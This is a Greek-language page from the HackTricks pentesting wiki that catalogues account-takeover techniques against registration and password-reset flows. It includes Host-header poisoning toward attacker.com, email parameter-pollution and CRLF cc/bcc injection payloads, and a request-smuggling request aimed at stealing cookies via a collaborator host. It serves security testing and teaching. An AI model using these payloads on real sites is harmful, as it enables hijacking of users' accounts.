hacktricks/pentesting-web/registration-vulnerabilities.md

16 KiB
Raw Blame History

Ευπάθειες Εγγραφής & Κατάληψης

Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (Ειδικός Ερυθρού Συνεργείου HackTricks AWS)!

Άλλοι τρόποι υποστήριξης του HackTricks:

WhiteIntel

WhiteIntel είναι μια μηχανή αναζήτησης που τροφοδοτείται από το dark web και προσφέρει δωρεάν λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν διαρρεύσει λόγω κλοπής πληροφοριών από κλέφτες κακόβουλου λογισμικού.

Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση της κατάληψης λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό κλοπής πληροφοριών.

Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:

{% embed url="https://whiteintel.io" %}


Κατάληψη Εγγραφής

Διπλή Εγγραφή

  • Δοκιμάστε να δημιουργήσετε χρησιμοποιώντας έναν υπάρχοντα όνομα χρήστη
  • Ελέγξτε ποικίλες μορφές του email:
    • κεφαλαία γράμματα
    • +1@
    • προσθέστε κάποιο τελεία στο email
    • ειδικοί χαρακτήρες στο όνομα του email (%00, %09, %20)
    • Βάλτε μαύρους χαρακτήρες μετά το email: test@test.com a
    • victim@gmail.com@attacker.com
    • victim@attacker.com@gmail.com

Απαρίθμηση Ονομάτων Χρηστών

Ελέγξτε αν μπορείτε να καταλάβετε πότε ένα όνομα χρήστη έχει ήδη καταχωρηθεί μέσα στην εφαρμογή.

Πολιτική Κωδικού Πρόσβασης

Δημιουργώντας έναν χρήστη ελέγξτε την πολιτική κωδικού πρόσβασης (ελέγξτε αν μπορείτε να χρησιμοποιήσετε αδύναμους κωδικούς πρόσβασης).
Σε αυτήν την περίπτωση μπορείτε να δοκιμάσετε να κάνετε βίαιη εισβολή στα διαπιστευτήρια.

Εισβολή SQL

Ελέγξτε αυτήν τη σελίδα για να μάθετε πώς να προσπαθήσετε να καταλάβετε λογαριασμούς ή να εξάγετε πληροφορίες μέσω Εισβολών SQL σε φόρμες εγγραφής.

Καταλήψεις Oauth

{% content-ref url="oauth-to-account-takeover.md" %} oauth-to-account-takeover.md {% endcontent-ref %}

Ευπάθειες SAML

{% content-ref url="saml-attacks/" %} saml-attacks {% endcontent-ref %}

Αλλαγή Email

Όταν είστε εγγεγραμμένοι δοκιμάστε να αλλάξετε το email και ελέγξτε αν αυτή η αλλαγή ελέγχεται σωστά ή μπορείτε να το αλλάξετε σε τυχαία emails.

Περισσότεροι Έλεγχοι

  • Ελέγξτε αν μπορείτε να χρησιμοποιήσετε προσωρινά emails
  • Μακρύ κωδικός πρόσβασης (>200) οδηγεί σε DoS
  • Ελέγξτε τα όρια ρυθμίσεων στη δημιουργία λογαριασμών
  • Χρησιμοποιήστε username@burp_collab.net και αναλύστε το callback

Κατάληψη Επαναφοράς Κωδικού

Διαρροή Διακριτικού Επαναφοράς Κωδικού Μέσω Referrer

  1. Ζητήστε επαναφορά κωδικού πρόσβασης στη διεύθυνση email σας
  2. Κάντε κλικ στον σύνδεσμο επαναφοράς κωδικού
  3. Μην αλλάξετε τον κωδικό
  4. Κάντε κλικ σε οποιονδήποτε ιστότοπο τρίτων (π.χ.: Facebook, twitter)
  5. Επικοινωνήστε με το αίτημα στον διακομιστή Burp Suite proxy
  6. Ελέγξτε αν ο κεφαλίδα αναφοράς (referer) διαρρέει το διακριτικό επαναφοράς κωδικού.

Δηλητηρίαση Επαναφοράς Κωδικού

  1. Επικοινωνήστε με το αίτημα επαναφοράς κωδικού στο Burp Suite
  2. Προσθέστε ή επεξεργαστείτε τις παρακάτω κεφαλίδες στο Burp Suite: Host: attacker.com, X-Forwarded-Host: attacker.com
  3. Προωθήστε το αίτημα με την τροποποιημένη κεφαλίδα
    http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com
  4. Αναζητήστε μια διεύθυνση URL επαναφοράς κωδικού βασισμένη στην κεφαλίδα host όπως: https://attacker.com/reset-password.php?token=TOKEN

Επαναφορά Κωδικού Μέσω Παραμέτρου Email

# parameter pollution
email=victim@mail.com&email=hacker@mail.com

# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}

# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com

# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com

IDOR στις Παραμέτρους του API

  1. Ο Επιτιθέμενος πρέπει να συνδεθεί με τον λογαριασμό του και να μεταβεί στο χαρακτηριστικό Αλλαγή κωδικού πρόσβασης.
  2. Ξεκινήστε το Burp Suite και Εγκαταλείψτε το αίτημα
  3. Στείλτε το στο καρτέλα repeater και επεξεργαστείτε τις παραμέτρους: Αναγνωριστικό Χρήστη/ηλεκτρονικό ταχυδρομείο
    powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})

Αδύναμο Διακριτικό Επαναφοράς Κωδικού Πρόσβασης

Το διακριτικό επαναφοράς κωδικού πρόσβασης πρέπει να δημιουργείται τυχαία και να είναι μοναδικό κάθε φορά.
Προσπαθήστε να καθορίσετε εάν το διακριτικό λήγει ή αν είναι πάντα το ίδιο, σε ορισμένες περιπτώσεις ο αλγόριθμος δημιουργίας είναι αδύναμος και μπορεί να μαντευτεί. Οι παρακάτω μεταβλητές μπορεί να χρησιμοποιούνται από τον αλγόριθμο.

  • Χρονική σήμανση
  • Αναγνωριστικό Χρήστη
  • Ηλεκτρονικό ταχυδρομείο του Χρήστη
  • Όνομα και Επώνυμο
  • Ημερομηνία Γέννησης
  • Κρυπτογραφία
  • Μόνο αριθμοί
  • Μικρή ακολουθία διακριτικού (χαρακτήρες μεταξύ [Α-Ζ,α-ζ,0-9])
  • Επαναχρησιμοποίηση Διακριτικού
  • Ημερομηνία λήξης Διακριτικού

Διαρροή Διακριτικού Επαναφοράς Κωδικού Πρόσβασης

  1. Ενεργοποιήστε ένα αίτημα επαναφοράς κωδικού χρησιμοποιώντας το API/UI για ένα συγκεκριμένο ηλεκτρονικό ταχυδρομείο π.χ: test@mail.com
  2. Επιθεωρήστε την απάντηση του διακομιστή και ελέγξτε το resetToken
  3. Στη συνέχεια χρησιμοποιήστε το διακριτικό σε ένα URL όπως https://example.com/v3/user/password/reset?resetToken=[ΤΟΙΑΚΡΙΤΙΚΟ_ΕΠΑΝΑΦΟΡΑΣ]&email=[ΤΟ_ΗΛΕΚΤΡΟΝΙΚΟ_ΤΑΧΥΔΡΟΜΕΙΟ]

Επαναφορά Κωδικού Πρόσβασης Μέσω Σύγκρουσης Ονόματος Χρήστη

  1. Εγγραφείτε στο σύστημα με ένα όνομα χρήστη που είναι ταυτόσημο με το όνομα χρήστη του θύματος, αλλά με κενά που έχουν εισαχθεί πριν και/ή μετά από το όνομα χρήστη. π.χ: "admin "
  2. Ζητήστε επαναφορά κωδικού με το κακόβουλο όνομα χρήστη.
  3. Χρησιμοποιήστε το διακριτικό που στάλθηκε στο ηλεκτρονικό σας ταχυδρομείο και επαναφέρετε τον κωδικό του θύματος.
  4. Συνδεθείτε στον λογαριασμό του θύματος με τον νέο κωδικό.

Η πλατφόρμα CTFd ήταν ευάλωτη σε αυτήν την επίθεση.
Δείτε: CVE-2020-7245

Κατάληψη Λογαριασμού Μέσω Cross Site Scripting

  1. Βρείτε ένα XSS μέσα στην εφαρμογή ή ένα υποτομέα αν τα cookies είναι περιορισμένα στο γονικό domain: *.domain.com
  2. Διαρρεύστε το τρέχον cookie συνεδρίας
  3. Ταυτοποιηθείτε ως ο χρήστης χρησιμοποιώντας το cookie

Κατάληψη Λογαριασμού Μέσω HTTP Request Smuggling

  1. Χρησιμοποιήστε το smuggler για να ανιχνεύσετε τον τύπο του HTTP Request Smuggling (CL, TE, CL.TE)
    powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h\
  2. Δημιουργήστε ένα αίτημα που θα αντικαταστήσει το POST / HTTP/1.1 με τα ακόλουθα δεδομένα:
    GET http://something.burpcollaborator.net HTTP/1.1 X: με στόχο την ανοικτή ανακατεύθυνση των θυμάτων στο burpcollab και την κλοπή των cookies τους\
  3. Το τελικό αίτημα μπορεί να μοιάζει με το ακόλουθο
GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0

GET http://something.burpcollaborator.net  HTTP/1.1
X: X

Παραβιάζοντας τον Λογαριασμό μέσω CSRF

  1. Δημιουργήστε ένα payload για το CSRF, π.χ: "Φόρμα HTML με αυτόματη υποβολή για αλλαγή κωδικού πρόσβασης"
  2. Αποστείλετε το payload

Παραβίαση Λογαριασμού μέσω JWT

Το JSON Web Token μπορεί να χρησιμοποιηθεί για την ταυτοποίηση ενός χρήστη.

  • Επεξεργαστείτε το JWT με άλλο User ID / Email
  • Ελέγξτε για αδύναμη υπογραφή JWT

{% content-ref url="hacking-jwt-json-web-tokens.md" %} hacking-jwt-json-web-tokens.md {% endcontent-ref %}

Αναφορές

WhiteIntel

WhiteIntel είναι μια μηχανή αναζήτησης που τροφοδοτείται από το dark web και προσφέρει δωρεάν λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν διαρρεύσει από κλέφτες κακόβουλων λογισμικών.

Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των παραβιάσεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.

Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:

{% embed url="https://whiteintel.io" %}

Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι υποστήριξης του HackTricks: